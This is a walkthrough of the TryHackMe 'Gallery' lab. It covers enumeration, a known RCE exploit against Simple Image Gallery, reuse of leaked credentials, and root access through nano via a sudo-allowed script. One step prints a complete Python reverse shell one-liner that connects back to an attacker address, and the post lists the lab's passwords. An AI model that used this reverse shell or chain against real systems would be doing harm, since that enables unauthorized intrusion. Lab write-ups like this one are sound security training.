Tryhackme - Gallery

Tryhackme – Gallery

In this walk through, we will be going through the Gallery room from Tryhackme. This room is rated as Easy on the platform and in this we will try to exploit an image gallery system to capture the root flag. So, let’s get started without any delay.

Gallery

Machine Info:

TitleGallery PwnKit Solve
IPaddress10.10.71.178
DifficultyEasy
ObjectiveTry to exploit our image gallery system

Enumeration:

  • I started off with my regular nmap scan and found two ports opened – 80 and 8080 (HTTP).

sudo nmap -sS -sV 10.10.168.35

nmap scan

  • I took a look on port 80 and found a default apache page. Nothing fancy!

Apache2 Default Page

  • Next, i looked into port 8080 and it took me to a “Simple Image Gallery System” login page.

Simple Image Gallery System

  • Fired gobuster on port 80 and found a gallery which eventually also redirects to the same URL as port 8080.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.168.35/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.168.35/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/20 21:14:49 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/gallery              (Status: 301) [Size: 314] [--> http://10.10.168.35/gallery/]

gobuster scan

  • Moving on, i looked for known exploits for the running CMS and found a Unauthenticated RCE exploit.

Simple Image Gallery 1.0 - RCE

Initial Access:

  • Used the found exploit to get the initial foothold on the system by getting a web shell.

searchsploit Simple Image

searchsploit Simple Image

python exploit

command execution

  • Next, i stabilized my shell by using the below python reverse shell and got the connection back at my nectat listener.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.1.78",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

executing the reverse shell

netcat listener

  • While looking around the file system, i found initialize.php file where the database credentials were hardcoded in clear text.

cat initialize.php

  • Used the found creds to log into the sql database and dumped the admin password hash.

www-data@gallery:/tmp$ mysql -u gallery_user -p 
mysql -u gallery_user -p
Enter password: passw0rd321

mysql login

admin password

Privilege Escalation:

  • Now, i used Linpeas to enumerate the system for some privilege escalation attack vectors and found a password attempt in history files. Used the password to log in as mike on the system.

linpeas result

b3stpassw0rdbr0xx

user flag

  • Next, i checked the sudo permissions for user mike and found out that he can run bash shell as root for /otp/rootkit.sh file.

sudo -l

sudo -l

  • As i checked the contents of the rootkit.sh file it had a little program using the case statements to present the choices. The last one got my attention – nano.

cat rootkit.sh

  • Used a GTFObins exploit in order to abuse the nano binary and get a root shell back.

GTFObins nano

  • I got some problems in executing the the “read” option initially. Then, i upgraded my shell to full tty and tried and it worked.

rootkit.sh

  • Used the exploit to got the root shell and captured the flag.

nano priv esc

root flag

Task 1 – Deploy and get a Shell

Question 1 – How many ports are open?

Question 2 – What’s the name of the CMS?

Question 3 – What’s the hash password of the admin user?

Question 4 – What’s the user flag?

Task 1 - Deploy and get a Shell

Task 2 – Escalate to the root user

Question 1 – What’s the root flag?

Task 2 - Escalate to the root user

Also Read: Tryhackme – Blueprint

Conclusion:

Conclusion

So that was “Gallery” for you. We first started with a nmap scan with service version detection flag set and found two ports opened – 80 and 8080 (HTTP). Enumerated port 8080 and found a Simple Image Gallery System login page. Looked for any known exploits for the running CMS and found a RCE exploit. Used it to upload and execute a reverse shell on the target and got the initial foothold. Next, found the Mysql creds in initialize.php file and using that dumped the admin password hash. Moving on, found the user mike password using in Linpeas in history of one of the files and using that changed user to mike. Now, looked for the sudo permissions of the user and found that the user mike can run rootkit.sh script as user root. The script uses different binaries and out of them we exploited nano using GTFObins in order to get root access on the target and capture the flag. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top